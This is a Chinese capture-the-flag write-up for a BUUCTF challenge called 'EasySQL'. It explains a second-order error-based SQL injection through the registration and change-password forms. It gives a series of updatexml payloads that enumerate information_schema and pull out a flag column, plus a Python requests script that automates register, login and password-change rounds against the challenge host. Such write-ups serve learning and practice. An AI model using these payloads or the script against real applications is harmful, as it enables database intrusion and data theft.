EasySQL

进入后台之后有个修改密码功能,猜报错注入。注册页面有危险字符过滤,由于BUU的靶机顶不住fuzz,只能稍微fuzz了一下,一堆429,发现反斜杠、括号以及单双引号还是都能用。

那么可以猜出来查询语句的结构:

select * from user where username="{$username}" and pwd='{md5($password)}'

比较难搞的就是pwd的变量是有经过md5编码的,那么注入点就只能从$username搞起来了。又是二次注入,每次都需要注册再修改,很蛋疼。尝试报错注入,由于不能扫,本地拼接了再远程,很麻烦:

admin"||updatexml(1,concat(0x7e,(version()),0x7e),1);#
admin"||updatexml(1,concat(0x7e,(select(group_concat(TABLE_SCHEMA))from(information_schema.tables)),0x7e),1);#
admin"||updatexml(1,concat(0x7e,(select(group_concat(TABLE_NAME))from(information_schema.tables)WHERE(TABLE_SCHEMA=database())),0x7e),1);#
admin"||updatexml(1,concat(0x7e,(select(group_concat(COLUMN_NAME))from(information_schema.columns)WHERE(TABLE_NAME='users'))),1);#
admin"||updatexml(1,concat(0x7e,(select(real_flag_1s_here)from(users))),1);#
admin"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#
admin"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1));#

脚本

import requests

# Target endpoints: one challenge instance, three form handlers.
_base = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82'
url_reg = _base + '/register.php'
url_log = _base + '/login.php'
url_change = _base + '/changepwd.php'

# Fixed prefix/suffix wrapped around each candidate character in the loop below.
pre = 'peri0d"'
suf = "'))),1))#"

# Candidate characters tried one per round (lowercase letters, then digits).
s = list('abcdefghijklmnopqrstuvwxyz1234567890')

# One session so the login cookie carries over to the password-change request.
r = requests.session()

def register(name):
    """POST the registration form with `name` as the username.

    Password and email are fixed filler values; the response is discarded.
    Uses the module-level session `r` and endpoint `url_reg`.
    """
    form = {'username': name, 'password': '123', 'email': '123'}
    r.post(url=url_reg, data=form)

def login(name):
    """POST the login form for `name` with the fixed password used at registration.

    The response is discarded; any session cookie is kept by the shared session `r`.
    """
    form = {'username': name, 'password': '123'}
    r.post(url=url_log, data=form)
	
def changepwd():
    """POST the password-change form with empty fields and print any unusual response.

    A body containing 'target' is treated as the normal page (presumably the
    usual redirect/markup — not confirmed here) and is ignored; anything else,
    such as a database error message, is printed in full.
    """
    resp = r.post(url=url_change, data={'oldpass': '', 'newpass': ''})
    body = resp.text
    if 'target' in body:
        return
    print(body)

# Main loop: one register/login/change-password round per candidate character.
# The username is pre + fixed middle part + the character + suf; changepwd()
# prints the server's response whenever it lacks the normal page marker.
_middle = "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('"
for ch in s:
    name = f"{pre}{_middle}{ch}{suf}"
    register(name)
    login(name)
    changepwd()
